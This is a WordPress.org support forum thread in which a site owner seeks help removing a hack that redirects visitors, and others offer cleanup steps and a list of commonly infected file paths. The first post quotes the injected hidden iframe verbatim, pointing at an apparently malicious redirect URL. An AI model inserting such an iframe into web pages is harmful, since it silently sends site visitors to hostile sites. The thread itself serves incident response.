WordPress.org

Ready to get started?Download WordPress

Forums

hacked with iFrames, need hep finding it (hours spent already) (11 posts)

  1. GuysNation_Rob
    Member
    Posted 2 years ago #

    I'm using the latest version of WordPress, and all my plugins are updated.

    When my site loads, it automatically redirects a user to other sites.

    I viewed the page source from Firefox and it clearly shows that iframe is the culpret.

    I've used my FTP program (FileZilla) to download the site to my machine and I used the Windows search functionality to look for anywhere that "iframe" text shows up in the files. It found dozens of files, and I looked through each of them, and I can't figure out what's causing the iframe redirect from my main page.

    I was hoping someone would ake pity on me and try to help me determine where to look.

    shown below is the only instance of iframe in the page source for the main page once it's loaded.

    <style type="text/css">
    			.picapp-gallery-wrap {
    				margin:0 auto;
    				text-align:center;
    			}
    			.picapp-gallery-row {
    				clear:both;
    			}
    
    			.picapp-gallery-row:after {
    				clear:both;
    				content:'.';
    				display:block;
    				height:0;
    				visibility:hidden;
    			}
    
    			.picapp-gallery-image {
    				display:block;
    				float:left;
    				margin:5px;
    			}
    		</style>
    
    <script type="text/javascript">var AKPC_IDS = "";</script>
    	<IFRAME style='display:none' NAME='ss' SRC='http://hqsearchonline.com/tds/in.cgi?5&user=mexx' WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
    <style type="text/css" media="print">#wpadminbar { display:none; }</style>

    PLEASE someone help me! I'm driving myself nuts on this, and the site has been down for more than a day.

  2. Digital Raindrops
    Member
    Posted 2 years ago #

    Check out this Google link about the hqsearchonline.com it looks like an injection / infection, contact you ISP!

    It found dozens of files, and I looked through each of them, and I can't figure out what's causing the iframe redirect from my main page

    The injection could be from your hosting provider, see if they can restore your site to a point before the problem.

    Regards

    David

  3. Anthony
    Member
    Posted 2 years ago #

    Did you follow the instructions at http://codex.wordpress.org/FAQ_My_site_was_hacked

    If you are certain that you have successfully removed all of the malicious code from the files. Do a search in PhpMyAdmin for the phrases "iframe" and the URL's used in the iframes.

  4. Anthony
    Member
    Posted 2 years ago #

  5. GuysNation_Rob
    Member
    Posted 2 years ago #

    I'll contact my ISP about the possible injection to see what they can do, but I host four other sites, none of which have much traffic at all (less than 20 total hits per day), and none of them have the iframe redirects... though none of them use WordPress.

    Very familiar with the FAQ_My_site_was_hacked entry at wordpress.org
    - stayed calm
    - scanned my local, it's fine
    - changed my passwords and secret keys
    - have backups
    - read the articles
    - checked my .htaccess
    - upgraded to the latest version of everything

    I'm not certain that I've successfully removed all of the malicious code from the files because I can't find out which files the mal-code is in. I looked through all the instances of "iframe" and I didn't see any spots where it looked like that's what was causing the redirect.

    Do a search in PhpMyAdmin for the phrases "iframe" and the URL's used in the iframes

    not sure what you mean about PhpMyAdmin, but i downloaded the entire site via ftp to a new location on my machine, then used Windows' search on the entire directory (and subfolders) for "iframe" inside the file. It came up with about 25 files, and I went through each of them one by one, looking for the phrase "iframe" and i looked over what the code was saying and I couldn't determine which one was causing the redirects. In fairness, I'm not a professional developer, and I wasn't able to fully follow all the references which used arrays and such. I will admit that I was looking for a piece of code which was basically just the exact HTML reference, maybe with a variable or two thrown in.

  6. MickeyRoush
    Member
    Posted 2 years ago #

    not sure what you mean about PhpMyAdmin

    Anthony is referring to your database. It's usually accessed through your control panel (cpanel or whatever). Before you do anything with it, make sure you back it up. Then start searching through it. But hopefully that isn't where the infection is. You probably have multiple files spread throughout your whole site, I could be wrong, but you sound like you have a version of a timthumb attack. Which if you do, you could have infected files in all three main directories.

    For example:

    Four standard WordPress files that could be infected:
    /wp-config.php
    /wp-settings.php
    /wp-includes/js/l10n.js
    /wp-includes/js/jquery/jquery.js

    The latest hack could also create the following files:
    /wp-admin/common.php
    /wp-admin/upd.php
    /wp-admin/js/config.php
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php (or similar)
    /wp-content/themes/[theme's name]/temp/eab9c5e9815adc4c40a6557495eed6d3.php (or similar)
    /wp-content/upd.php
    /wp-content/data.php

    Possibly also:
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    &
    /wp-content/themes/[theme's name]/wp.php
    /wp-content/themes/[theme's name]/sm3.php
    /wp-content/themes/[theme's name]/r1.php
    /wp-content/themes/[theme's name]/2.php
    /wp-content/themes/[theme's name]/cache/.htaccess

    &
    .htaccess (at the root) (redirects are added at the end, after a lot of white space)

    & most recently your themes header.php file could have been hacked:
    /wp-content/themes/[theme's name]/header.php

    Also look in any cache, temp, and/or tmp files.

    See there could be files placed anywhere. That's why they say to "Nuke" it from orbit. :)

  7. BlogASAP
    Member
    Posted 2 years ago #

    GuysNation_Rob,
    A few days ago, several of my blogs were injected with the same malicious iFrame script (right down to the affiliate link of the user who is behind it). All told, I had about 8 blogs on a single shared hosting account that were affected.

    My first means of resolving the issue was to restore a backup of the databases and website files, change all my passwords and DB usernames, delete all my FTP accounts and watch. Within two days, one of my blogs was redirecting again. I deleted the directory and all subdirectories for that account, then watched. So far, so good.

    Despite the fact that the problem seemed to have been resolved after I took the above steps, I'm not certain that I actually isolated and removed the infected files. In fact, I suspect the server may have been infected. The fact that only one blog was re-infected may have more to do with changes they made to their server after I reported the problem than anything I did to correct it on my end. Just out of curiosity, what hosting company do you use?

  8. Jonas Grumby
    Member
    Posted 2 years ago #

  9. Jonas Grumby
    Member
    Posted 2 years ago #

    BTW as long as you haven't hacked your core WordPress files, you can always upload a fresh copy as long as you keep the settings in wp-config.php. You can also upload fresh copies of your plugins & theme. Always back up your old files just in case, even if they are hacked. Hopefully it's not in your database.

  10. GuysNation_Rob
    Member
    Posted 2 years ago #

    I think I took care of it. I replaced all the core WordPress files after changing all my passwords and I had installed WordPress Firewall.

    I keep getting emails saying that WordPress Firewall blocked an attack on wp-comments-post.php

    anyone have thoughts on that aspect of it?

  11. BlogASAP
    Member
    Posted 2 years ago #

    What host are you using Rob?

Topic Closed

This topic has been closed to new replies.

About this Topic